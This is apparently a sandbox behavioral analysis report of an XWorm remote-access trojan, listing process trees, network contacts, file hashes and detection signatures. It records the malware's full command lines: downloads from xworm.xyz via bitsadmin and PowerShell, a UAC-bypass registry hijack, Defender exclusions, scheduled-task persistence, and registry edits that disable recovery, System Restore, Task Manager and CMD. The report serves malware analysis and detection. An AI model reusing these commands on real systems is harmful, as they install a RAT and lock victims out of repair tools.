Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5112 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5112 wrote to memory of 4500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4500 wrote to memory of 2352 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4500 wrote to memory of 2352 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5112 wrote to memory of 3868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5112 wrote to memory of 3868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5112 wrote to memory of 5104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 5112 wrote to memory of 5104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 5112 wrote to memory of 260 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 260 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 4536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5112 wrote to memory of 4536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4536 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 4536 wrote to memory of 1032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 4536 wrote to memory of 468 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Uni.exe
PID 4536 wrote to memory of 468 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Uni.exe
PID 468 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 468 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 468 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 468 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 468 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 468 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 468 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 468 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 468 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\schtasks.exe
PID 468 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Windows\System32\schtasks.exe
PID 468 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Users\Admin\AppData\Local\Temp\cknnzt.exe
PID 468 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Users\Admin\AppData\Local\Temp\cknnzt.exe
PID 468 wrote to memory of 4144 N/A C:\Users\Admin\AppData\Local\Temp\Uni.exe C:\Users\Admin\AppData\Local\Temp\cknnzt.exe
PID 4144 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\cknnzt.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4144 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\cknnzt.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4144 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\cknnzt.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4144 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\cknnzt.exe C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe
PID 4144 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\cknnzt.exe C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe
PID 4144 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\cknnzt.exe C:\Windows\SysWOW64\cmd.exe
PID 4144 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\cknnzt.exe C:\Windows\SysWOW64\cmd.exe
PID 4144 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\cknnzt.exe C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 4760 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 4760 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ReAgentc.exe
PID 4760 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 1568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 1568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 1568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 3248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 3248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 3248 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 1020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 1020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 1020 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 4544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 4544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 4544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 4480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 4480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 4480 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-test.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat"

C:\Windows\system32\certutil.exe

certutil -decodehex temp.hex "Uni.exe"

C:\Users\Admin\AppData\Local\Temp\Uni.exe

Uni.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Uni.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\AppData\Local\Temp\cknnzt.exe

"C:\Users\Admin\AppData\Local\Temp\cknnzt.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAagBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AbgB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAZgBmACMAPgA="

C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe

"C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\reset survival.bat" "

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Windows\SysWOW64\ReAgentc.exe

reagentc /disable

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsSetupOptions" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowCPL" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoThemesTab" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoDispSettings" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 2 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\WinRE" /v "DisableStatusMessages" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute" /v "AutoChk" /t REG_MULTI_SZ /d "" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /Change /TN "\Microsoft\Windows\WinRE\WinREBootIndex" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks /Change /TN "\Microsoft\Windows\WinRE\WinRECleanup" /Disable

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\sr" /v "Start" /t REG_DWORD /d 4 /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\sc.exe

sc config wercplsupport start=disabled

C:\Windows\SysWOW64\sc.exe

sc config WerSvc start=disabled

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe

C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe

C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe

C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding

C:\Users\Admin\Uni.exe

C:\Users\Admin\Uni.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 xworm.xyz udp
US 198.54.114.193:443 xworm.xyz tcp
US 8.8.8.8:53 193.114.54.198.in-addr.arpa udp
US 198.54.114.193:443 xworm.xyz tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 las-protected.gl.at.ply.gg udp
US 147.185.221.18:59571 las-protected.gl.at.ply.gg tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp
US 147.185.221.18:59571 las-protected.gl.at.ply.gg tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

memory/260-0-0x00007FF9FC433000-0x00007FF9FC434000-memory.dmp

memory/260-5-0x00000217001B0000-0x00000217001D2000-memory.dmp

memory/260-8-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp

memory/260-9-0x0000021700380000-0x00000217003F6000-memory.dmp

memory/260-10-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_11wev4dl.sau.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/260-25-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp

memory/260-31-0x00007FF9FC430000-0x00007FF9FCE1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat

MD5 011e90b162cf67f34f91d6d563859817
SHA1 30ce18995be9545ae88189bc3ff5defbd2392d11
SHA256 6cced62e6af36a52c48fdf0efb1571a44d6469f4ca66ca510020e5da407ed613
SHA512 51d47a852b27540154c8b3ccb295dae4874475bf631be931bf8a4cf271805e927162c7f01e8df7f0aea8b9a860dac3500e59208cb60440bfa8e827325be7a36d

C:\Users\Admin\AppData\Local\Temp\temp.hex

MD5 fad3aaf3015914e834a9d0313fcd371b
SHA1 a4715a153a79263436819905b87b54acae4b2227
SHA256 917674ca36b5345dccd41f4ce772c6ffe8c3054520ebd2923fba768cbee77690
SHA512 64c9bd116ad70abf9e8bf444f248915383d4b4680de1f6dadad649e0279803c9575952b0e1995a34e47c5a73eb42e23e964437a4a7828d3214f3f694383db83a

C:\Users\Admin\AppData\Local\Temp\Uni.exe

MD5 09e870076cfaa16f20be5050834ba8ff
SHA1 0b8b26cdaf08a07b8e86b1643ca23e249c8f3840
SHA256 f3fcb094f57ddd9e4c29eccc62e3ad3ce50d40230fbe0f00324ccf18acd68bc4
SHA512 d655030bf9bb84ecdd7109aab55c33976e2a2cbd63ccece48d3e881b1dd378e4e17f157a3dd9a07e8786650cbf46b8d742a115cb9906c9b69d7143c2b4de0643

memory/468-39-0x0000000000D30000-0x0000000000D40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 56efdb5a0f10b5eece165de4f8c9d799
SHA1 fa5de7ca343b018c3bfeab692545eb544c244e16
SHA256 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA512 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 da91425d0490a65f6e9317a1e831bdd2
SHA1 46886dde43736432786516865dc7c2536398ea11
SHA256 6e8bb649646ea0d2c9acf771dc32b365c08eb26b4f5bf88b003726ca3940a379
SHA512 abc0776b5c1885b9cda6b5ba5fa500afecc229309502c851e8db89c4aacd892acd7f9b08933a03e8b9bbfc3f1dfd477d53c25bf631015c2a43fa64804485efec

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9ff10ce90fa1f5a4e14683fade00fb08
SHA1 200b762060211bfda71bd56157a50b20bf7aa842
SHA256 fc9dc034c4b550190df44882e548b24ec1a6f5a4bc92b88869b377f3ffc03185
SHA512 ef628c6b0f6fd67b3ba0684585df407716f8e03f29a9c1b72eee7615d1c315e1c832fe4095b1fa0e4690df0a02b6c331b0a3b5d6099cdcd8291ab1fdd7f19cc2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 de68ca68ee303dfddbd9454fa0936cc9
SHA1 98e6c9050a451a86bf92abe4180cc67d2aea5819
SHA256 104a212eae1936ca7621842115c62bdfc2e69d67d19d3bdbdac91209a67f5272
SHA512 19de3dd8d3abca2388f563aa519aca32df4eeeb4ae0ed4d13979da4f8f019fd3e000f7f1e54214423fd82358c23f1d74b238540902a52cfc0046b5ffa84feedb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ae79f9644a1cb6c2536b818e32c2a2ef
SHA1 f2f11f31c742f37c57021d9f758bf01d0f4cd827
SHA256 fd223703c5342d45b55338ca56af0f1ca7c06b9128c9e20d9777bcbbde43dd0d
SHA512 2c373f393a0813f2400db4aa3f365bd448c1ce877f5c36b5ffc3d9e7e8d59315f0ae025a6057125d2cb1eeedc15aaeb0fe6772bab32cb46232362af5d1a5b34e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Uni.exe.log

MD5 16c5fce5f7230eea11598ec11ed42862
SHA1 75392d4824706090f5e8907eee1059349c927600
SHA256 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

C:\Users\Admin\AppData\Local\Temp\cknnzt.exe

MD5 2841cd968c72817f9eef3a4bc2293d6e
SHA1 5b788259d501493a87f00deee64fa0943ab19e34
SHA256 e5a9784f523a6965622532199a42f696ca15557b473f84c12f18210085a20e95
SHA512 82eded2b67775763669452be98f7c5eeb0a3cd34f4947753fef9cedea4a1f56b49223ed7ad8e68b77e54ab2bf004e9ba22107afdc23e2e168dc60f2013907bf0

C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe

MD5 1d62aa3d19462f3d5575fc54159911b4
SHA1 b37eab86c0075245fcc517a280f0705f6dffb852
SHA256 6acaae0fb470790102a338e23dfe2263f31e529288e4efe51b34bca30371cb36
SHA512 78a9501d7920920577a586396e5d9e2278a7c926448c9a98d7844db9032dbd887df90d2f389fe1754bf5a2071a19dfd5d40315624923e903ef9ef6cbb214b1df

memory/708-236-0x000002532B540000-0x000002532B57C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\reset survival.bat

MD5 ecde221cbc92ee55ae5b8c1a24e98f56
SHA1 ebda0dba4abcd3bf93183e2787cc9e5f9f1448ee
SHA256 b6fbab33e31d0a525d4c752886d812c1c46477f6314da7bde25bdc8198cb70cb
SHA512 122673ad96f1e407c75a93672f6538f342499f4e14221cbe4103c601362667487f3f33800230572e255b55e691e5068adce6336a4ffe1a651bff465d2c2d3493

memory/4268-240-0x00000000071D0000-0x0000000007206000-memory.dmp

memory/4268-241-0x0000000007840000-0x0000000007E68000-memory.dmp

memory/4268-247-0x0000000007EE0000-0x0000000007F02000-memory.dmp

memory/4268-248-0x0000000008060000-0x00000000080C6000-memory.dmp

memory/4268-249-0x00000000080D0000-0x0000000008136000-memory.dmp

memory/4268-250-0x0000000008240000-0x0000000008590000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 74f05ed3358c5a90314fc3f2de8edbbb
SHA1 a83797f4b6d98240dbf3154dd1fdd9fd8f299a14
SHA256 e15317e9b6c7b084a44146b2bf4a501af327f0f3b2894451afc8db4c52855093
SHA512 5158d6b1e910a230c207ba9f5184d72867092b07fe9807cdc1c5b4e34ee21b971911419e2e6ab4ee39f47afa714e9a6b2bb7467fc3ac509279ed0fb72e2a4fa9

memory/4268-252-0x0000000008010000-0x000000000802C000-memory.dmp

memory/4268-253-0x0000000008A10000-0x0000000008A5B000-memory.dmp

memory/4268-254-0x0000000008950000-0x00000000089C6000-memory.dmp

memory/4268-271-0x0000000009820000-0x0000000009853000-memory.dmp

memory/4268-272-0x0000000073040000-0x000000007308B000-memory.dmp

memory/4268-273-0x00000000097E0000-0x00000000097FE000-memory.dmp

memory/4268-278-0x0000000009990000-0x0000000009A35000-memory.dmp

memory/4268-279-0x0000000009D50000-0x0000000009DE4000-memory.dmp

memory/4268-472-0x0000000009CF0000-0x0000000009D0A000-memory.dmp

memory/4268-477-0x0000000009CE0000-0x0000000009CE8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-27 23:17

Reported

2024-07-27 23:28

Platform

win11-20240709-en

Max time kernel

598s

Max time network

603s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\SysWOW64\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables use of System Restore points

evasion

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Software\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe" C:\Users\Admin\AppData\Local\Temp\Uni.exe N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\certutil.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\Recovery C:\Windows\SysWOW64\ReAgentc.exe N/A
